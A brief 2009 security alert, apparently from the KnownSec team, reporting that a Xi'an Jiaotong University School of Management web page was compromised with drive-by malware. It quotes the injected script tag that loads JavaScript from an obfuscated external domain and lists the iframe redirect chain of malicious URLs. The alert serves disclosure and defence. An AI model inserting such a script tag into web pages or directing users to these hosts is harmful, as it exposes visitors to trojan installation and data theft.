发布时间:Sat Aug 15 2009 22:54:42 UTC+0800
最后更新时间:Sat Aug 15 2009 22:54:42 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 西安交通大学管理学院(http://som.xjtu.edu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://som.xjtu.edu.cn/
网页被嵌入恶意链接代码:
<script language=”JavaScript” src=”http://0810.%36%3600.org” type=”text/javascript” id=”seraph2script2108″ ></script>
挂马分析:
[wide]http://som.xjtu.edu.cn/
[script]http://0810.%36%3600.org
[iframe]http://cnksp.cn/dszq/3.htm
[iframe]http://g1a1e.cn/x3/xx.html
[iframe]http://g1a1e.cn/x3/td14.htm
[iframe]http://g1a1e.cn/x3/yt.htm
[iframe]http://g1a1e.cn/x3/dxxz.htm
[iframe]http://g1a1e.cn/x3/yut.htm
最终下载
Popularity: 5% [?]
